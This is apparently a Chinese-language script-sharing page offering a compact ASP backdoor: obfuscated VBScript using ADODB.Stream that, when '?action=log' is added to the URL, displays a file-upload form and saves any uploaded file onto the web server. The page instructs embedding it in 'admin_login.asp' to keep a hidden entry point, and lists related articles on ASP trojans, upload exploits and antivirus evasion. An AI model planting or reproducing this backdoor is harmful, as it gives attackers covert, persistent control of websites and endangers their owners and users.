 
<%if request.QueryString("action")="log" then 
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> 
<%end if%> 

比如編輯在“admin_login.asp”下
以后只需要輸入“admin_login.asp?action=log”即可

ASP后門

相關(guān)文章

實(shí)例分析ASP上傳漏洞入侵實(shí)戰(zhàn)及擴(kuò)展
實(shí)例分析ASP上傳漏洞入侵實(shí)戰(zhàn)及擴(kuò)展...
2006-09-09
新型ASP后門源代碼分析
新型ASP后門源代碼分析...
2007-01-01
七步倒┈→專用asp后門
七步倒┈→專用asp后門...
2007-06-06
利用Microsoft.XMLHTTP控件發(fā)送COOKIE
利用Microsoft.XMLHTTP控件發(fā)送COOKIE...
2006-09-09
一個(gè)較新的ASP后門服務(wù)端實(shí)現(xiàn)代碼
一直很奇怪，為什么客戶端里面不是eval，就是execute，不管我藏哪里，管理員用個(gè)什么XX webshell掃描器，就能踢我屁股了。
2010-10-10
Asp常見(jiàn)掛馬方式大總結(jié)
這篇文章指在告訴大家壞人經(jīng)常使用的網(wǎng)頁(yè)掛馬方式，從而可以對(duì)自己的網(wǎng)頁(yè)進(jìn)行防范，只要檢測(cè)這些經(jīng)常被用于掛馬的地方，很容易找到木馬的所在。
2011-08-08
海陽(yáng)2006+功能中的潛水王
由于IIS的啟動(dòng)帳戶IWAM的權(quán)限很低,所以雖然是以高權(quán)限的用戶當(dāng)作IUSR （來(lái)賓帳戶）來(lái)訪問(wèn)頁(yè)面但是只是獲得該用戶所擁有權(quán)限的目錄的讀寫等相應(yīng)權(quán)限罷了
2008-05-05
一句話 asp木馬加密版徹底突破殺毒軟件
一句話 asp木馬加密版徹底突破殺毒軟件...
2007-11-11
一個(gè)查ASP木馬的小東東
一個(gè)查ASP木馬的小東東
2006-07-07
一句話木馬入侵EASYNEWS新聞管理系統(tǒng)
一句話木馬入侵EASYNEWS新聞管理系統(tǒng)...
2006-07-07